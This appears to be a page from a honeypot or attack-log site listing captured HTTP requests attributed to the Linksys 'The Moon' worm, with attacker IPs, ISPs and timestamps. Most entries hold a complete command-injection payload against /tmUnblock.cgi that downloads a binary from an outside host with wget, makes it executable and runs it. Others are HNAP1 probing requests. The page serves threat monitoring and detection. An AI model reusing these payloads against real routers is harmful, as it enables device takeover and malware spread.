This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 17 results (2 pages)

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 192.168.0.14:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 10/08/2019 14:46:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 09/07/2019 07:07:16
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
rDNS: hn.kd.smx.adsl
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 171.38.151.223
Dest. port: 8080
Time: 05/02/2019 09:51:13
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Beijing, Chaowai
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: / User-Agent: python-requests/2.20.0 Host: 104.168.149.5:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F104.168.149.5%2Fvb%2FAmakano.mpsl%3B+chmod+777+Amakano.mpsl%3B+.%2FAmakano.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.134
Dest. port: 8080
Time: 13/01/2019 08:43:27
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Beijing, Fengtai
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 106.112.139.150
Dest. port: 8080
Time: 23/12/2018 12:16:57
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4134 No.31,Jin-rong Street
Location: Hebei, Shijiazhuang
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 192.168.0.14:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.flexsecurity.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&Start

Linksys "The Moon" Worm

[Attack info]
Attacker: 223.80.14.55
Dest. port: 8080
Time: 18/12/2018 01:08:46
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24444 China Mobile
Location: Shandong, Jinan
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 192.168.0.14:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.arm7plz.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 8080
Time: 27/04/2017 07:47:39
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Host: 109.64.157.234:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234:8080/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 80
Time: 27/04/2017 07:45:29
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 109.64.157.234 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 80
Time: 27/04/2017 07:45:28
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 109.64.157.234 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>